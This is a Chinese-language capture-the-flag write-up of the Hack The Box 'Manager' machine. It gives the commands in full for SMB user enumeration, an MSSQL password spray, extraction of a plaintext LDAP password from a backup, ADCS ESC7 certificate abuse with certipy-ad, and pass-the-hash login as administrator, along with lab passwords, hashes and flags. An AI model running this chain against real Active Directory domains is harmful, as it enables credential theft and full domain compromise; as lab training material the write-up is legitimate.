扫描靶机
nmap -sC -sV -sT -T4 -Pn 10.10.11.236
扫描出很多端口,常用的80,445,88的也有,扫出域名跟dc子域名,将他们加入到hosts里面,然后打开
浏览一下网站,貌似这是一个写作的网站,可惜我没有创造力,不然可以吹一波,然后我扫描一下目录
看目录没什么可以获取的信息,枚举一下445端口
crackmapexec smb 10.10.11.236 -u guest -p '' --rid-brute
看来空密码枚举出一堆用户名,收集起来,尝试使用AS-REP攻击
impacket-GetNPUsers -request -usersfile users.txt -dc-ip dc01.manager.htb manager.htb/
看来没卵用,换个思路,刚刚看到mssql端口,那就直接枚举mssql,由于不知道密码,所以密码也是用刚刚收集的用户名作为密码,记住要大小写一起,枚举mssql可以参考这篇文章
https://www.crackmapexec.wiki/mssql-protocol/untitled
crackmapexec mssql manager.htb -u user.txt -p user.txt --no-bruteforce
成功枚举出账号密码,然后使用impacket里面的mssqlclient连接,然后枚举出文件夹,这里有个版本的问题,自带的mssqlclient是不能列举出来的,要另外的版本才可以
python3 mssqlclient.py manager.htb/operator:operator@manager.htb -dc-ip dc01.manager.htb -windows-auth
可以看到有个backup的压缩包,网站是http://manager.htb/website-backup-27-07-23-old.zip,直接下载
下载有有个隐藏的xml文件,点击进去可以看到密码
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><server><host>dc01.manager.htb</host><open-port enabled="true">389</open-port><secure-port enabled="false">0</secure-port><search-base>dc=manager,dc=htb</search-base><server-type>microsoft</server-type><access-user><user>[email protected]</user><password>R4v3nBe5tD3veloP3r!123</password></access-user><uid-attribute>cn</uid-attribute></server><search type="full"><dir-list><dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir></dir-list></search></ldap-conf>
然后使用evil-winrm登陆进去,成功拿到user flag:bc08d3536d542dd29843ecd2de9f6e5a
evil-winrm -i manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'
上传Certify工具,寻找有没有可以利用的ADCS证书模板
.Certify.exe find /vulnerable
可以看到CA名字是manager-DC01-CA,我使用bloodhound收集一波信息
.SharpHound.exe --outputdirectory C:UsersRavenDocuments --ldapusername raven --ldappassword R4v3nBe5tD3veloP3r!123
emmm,找不到可以入手的地方,只能回到certity,从manager-DC01-CA入手,参考这篇文章
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#vulnerable-certificate-authority-access-control-esc7
记住是certipy-ad,不是单独的certipy,那个会报错的,而且用法也不一样
certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven.htb -password 'R4v3nBe5tD3veloP3r!123'certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven.htb -password 'R4v3nBe5tD3veloP3r!123'
certipy-ad req -username raven.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator.htbcertipy-ad ca -ca 'manager-DC01-CA' -issue-request 27 -username raven.htb -password 'R4v3nBe5tD3veloP3r!123'
certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -retrieve 27
记得同步服务器时间
# certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip 10.10.11.236Certipy v4.7.0 - by Oliver Lyak (ly4k)[*] Using principal: administrator@manager.htb[*] Trying to get TGT...[*] Got TGT[*] Saved credential cache to 'administrator.ccache'[*] Trying to retrieve NT hash for 'administrator'[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
然后使用evil-winrm登录,拿到root flag:56bfd8787d5481eab8b023c9e35dbb07
evil-winrm -i 10.10.11.236 -u administrator -H ae5064c2f62317332c88629e025924ef
原文始发于微信公众号(Jiyou too beautiful):HTB-Manager笔记
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论